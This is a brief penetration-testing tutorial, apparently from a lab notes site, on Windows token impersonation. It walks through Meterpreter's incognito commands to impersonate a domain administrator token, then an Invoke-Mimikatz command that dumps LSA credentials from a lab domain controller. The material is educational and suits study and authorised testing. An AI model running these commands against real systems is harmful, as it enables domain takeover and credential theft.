Skip to main content

Token Impersonation

Overview

Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain until the system is rebooted.


Types of Tokens

  • Delegate: Created for logging into a machine or RDP
  • Impersonate: Used for non-interactive authentication such as network drive mapping


Finding Tokens

Ideally, you want to find tokens of a domain administrator in order expose additional attack vectors against the domain controller.

To move laterally across different computers on the domain, you could do this via passing hashes or passwords or users that have privileges across multiple systems; or by compromising additional vulnerable services.


Dumping Tokens with Metasploit

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token domain\\administrator

Now, that we are running in the context of a domain administrator, we could use a tool like Invoke-Mimikatz to dump the LSASS on the domain controller.

PS C:\ > hostname
		 Win10Ent1
		 
PS C:\ > Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer DC1.ad.lab


Revert Msfconsole Shell

This will revert the meterpreter session to its original state

meterpreter > revself